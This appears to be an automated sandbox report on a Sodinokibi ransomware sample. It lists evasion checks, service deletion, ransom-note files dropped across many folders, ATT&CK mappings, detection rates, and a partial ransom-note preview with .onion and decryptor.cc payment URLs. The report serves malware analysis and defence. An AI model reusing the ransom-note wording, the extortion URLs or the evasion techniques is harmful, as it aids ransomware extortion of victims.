        Source: Sample_5fba9b06c7da400016eb6275.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA &apos;Win32_Process&apos;
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA &apos;Win32_Process&apos;
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA &apos;Win32_Process&apos;
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Sample_5fba9b06c7da400016eb6275.exeVirustotal: Detection: 89%
        Source: Sample_5fba9b06c7da400016eb6275.exeMetadefender: Detection: 48%
        Source: Sample_5fba9b06c7da400016eb6275.exeReversingLabs: Detection: 86%
        Source: unknownProcess created: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe 'C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe'
        Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeDirectory created: c:\program files\su84mu33c1-readme.txtJump to behavior
        Source: Sample_5fba9b06c7da400016eb6275.exeStatic PE information: section name: .axh
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009C30F8 pushfd ; ret 0_2_009C30FE
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: C:\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files (x86)\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\recovery\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files (x86)\microsoft sql server\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files (x86)\microsoft sql server\110\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\desktop\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\documents\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\downloads\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\favorites\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\links\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\music\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\pictures\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\saved games\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\default\videos\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\3d objects\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\contacts\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\downloads\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\favorites\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\links\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\music\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\onedrive\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\pictures\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\recent\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\saved games\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\searches\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\videos\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\accountpictures\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\desktop\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\documents\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\downloads\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\libraries\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\music\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\pictures\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\public\videos\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files (x86)\microsoft sql server\110\shared\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\eegwxuhvug\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\eowrvpqccs\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\fenivhoikn\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\gigiytffyt\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\grxzdkkvdb\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\mxpxcvpdvn\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\pwccawlgre\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\qncycdfijj\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\uoojjozirh\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\vamydfpund\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\wkxewiotxi\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\desktop\ztgjilhxqb\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\eegwxuhvug\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\eowrvpqccs\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\fenivhoikn\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\gigiytffyt\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\grxzdkkvdb\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\mxpxcvpdvn\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\pwccawlgre\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\qncycdfijj\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\uoojjozirh\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\vamydfpund\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\wkxewiotxi\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\documents\ztgjilhxqb\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\favorites\links\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\user\pictures\camera roll\su84mu33c1-readme.txtJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect sleep reduction / modificationsShow sources
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B595D0_2_009B595D
        Found evasive API chain (may stop execution after checking mutex)Show sources
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-4207
        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-5161
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B58B3 rdtsc 0_2_009B58B3
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_009B3B6E
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeWindow / User API: threadDelayed 10000Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-4733
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-4721
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe TID: 7024Thread sleep count: 10000 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B766A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_009B766A
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B53F1 GetSystemInfo,0_2_009B53F1
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeAPI call chain: ExitProcess graph end nodegraph_0-4235
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeAPI call chain: ExitProcess graph end nodegraph_0-4226
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeAPI call chain: ExitProcess graph end nodegraph_0-4293
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B58B3 rdtsc 0_2_009B58B3
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5083 mov eax, dword ptr fs:[00000030h]0_2_009B5083
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5408 mov ecx, dword ptr fs:[00000030h]0_2_009B5408
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B494C HeapCreate,GetProcessHeap,0_2_009B494C
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe0_2_009B4B05
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmpBinary or memory string: &Program Manager
        Source: unsecapp.exe, 0000000E.00000002.616569697.00000176D6E90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B4C25 cpuid 0_2_009B4C25
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5126 GetUserNameW,0_2_009B5126

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Replication Through Removable Media1Windows Management Instrumentation1Windows Service1Windows Service1Masquerading3Input Capture1Security Software Discovery12Replication Through Removable Media1Input Capture1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
        Default AccountsService Execution1Boot or Logon Initialization ScriptsProcess Injection12Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothProxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsNative API22Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsPeripheral Device Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Service Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery25Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Sample_5fba9b06c7da400016eb6275.exe90%VirustotalBrowse
        Sample_5fba9b06c7da400016eb6275.exe49%MetadefenderBrowse
        Sample_5fba9b06c7da400016eb6275.exe86%ReversingLabsWin32.Ransomware.Sodinokibi
        Sample_5fba9b06c7da400016eb6275.exe100%AviraTR/Crypt.XPACK.Gen
        Sample_5fba9b06c7da400016eb6275.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F0%Avira URL Cloudsafe
        http://decryptor.cc/2%VirustotalBrowse
        http://decryptor.cc/0%Avira URL Cloudsafe
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0%Avira URL Cloudsafe
        http://decryptor.cc/A7014F8C2779026F0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026FSample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drtrue
        • Avira URL Cloud: safe
        		unknown
        http://decryptor.cc/Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmpfalse
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://decryptor.cc/A7014F8C2779026FSample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://torproject.org/Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drfalse
          		high

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:326335
          Start date:03.12.2020
          Start time:10:02:31
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 19s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:Sample_5fba9b06c7da400016eb6275.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:24
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.evad.winEXE@2/207@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 98.2% (good quality ratio 94.3%)
          • Quality average: 87.1%
          • Quality standard deviation: 24.9%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe
          • Report size getting too big, too many NtOpenKeyEx calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Program Files (x86)\Microsoft SQL Server\110\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
